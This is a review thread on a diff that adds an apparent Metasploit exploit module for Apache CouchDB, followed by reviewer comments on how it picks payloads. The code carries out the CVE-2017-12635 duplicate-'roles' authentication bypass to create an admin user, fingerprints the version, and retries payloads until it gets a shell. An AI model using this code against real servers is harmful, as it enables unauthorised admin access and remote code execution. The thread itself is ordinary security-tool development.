modules/exploits/linux/http/apache_couchdb_cmd_exec.rb

```diff
@@ -0,0 +1,371 @@
+
+    start_http_server
+
+    (1..3).each do |i|
+      print_status("#{peer} - The #{i} time to exploit")
+      send_payload(version)
+      Rex::sleep(3)
+      # break if we get the shell
+      break if @exploit_flag
+    end
+  end
+
+  # CVE-2017-12635
+  # The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON,
+  # the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization
+  # for the newly created user.
+  def auth_bypass
+
+    username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(rand(8) + 4)
+    password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(rand(8) + 4)
+    @auth = basic_auth(username, password)
+
+    res = send_request_cgi(
+      'uri'           => normalize_uri(target_uri.path, "/_users/org.couchdb.user:#{username}"),
+      'method'        => 'PUT',
+      'ctype'         => 'application/json',
+      'data'          => %Q{{"type": "user","name": "#{username}","roles": ["_admin"],"roles": [],"password": "#{password}"}}
+    )
+
+    if res && res.code == 200 && res.get_json_document['ok']
+      return true
+    else
+      return false
+    end
+
+  end
+
+  def get_version
+    version = nil
+
+    begin
+      res = send_request_cgi(
+          'uri'           => normalize_uri(target_uri.path),
+          'method'        => 'GET',
+          'authorization' => @auth
+        )
+
+      temp = res.get_json_document if res
+
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, Rex::ConnectionTimeout => e
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+      return version
+
+    rescue JSON::ParserError
+      print_warning("#{peer} - Cannot parse the response, is it CouchDB?")
+      return version
+    end
+
+    unless res
+      print_bad("#{peer} - No response, check if it is CouchDB. ")
+      fail_with(Failure::UnexpectedReply, "#{peer} - No response, check if it is CouchDB.")
+    end
+
+    if res && res.code == 401
+      print_bad("#{peer} - Authentication required.")
+      fail_with(Failure::NoAccess, "#{peer} - Authentication required.")
+    end
+
+    if res && res.code == 200
+      if temp['version']
+          version = temp['version']
+        else
+          vprint_warning("#{peer} - Version not found")
+      end
+    end
+
+    version
+
+  end
+
+  def send_payload(version)
+    vprint_status("#{peer} - version is #{version}") if version
+
+    case
+    when version < '1.7.0'
+      payload1
+    when version.between?('2.0.0','2.1.0')
+      payload2
+    when version >= '1.7.0' || version > '2.1.0'
+      fail_with(Failure::NotVulnerable, "#{peer} - The target is not vulnerable.")
+    else
+      # Version not found, try randomly payload
+      vprint_warning("#{peer} - Cannot retrive the version, exploiting randomly...")
+      send([:payload1,:payload2].sample)
```

Comment:
Is a random payload the best way? Have you researched which versions are more common?

Reply:
Using a random payload is unintuitive, especially considering the change in control flow is not reported to the user unless `verbose` is set to `true`. If would be more intuitive to fail with an error message indicating that the automatic target selection failed.

Reply:
@bcoles Thank you! That should be a best way. I will do it soon.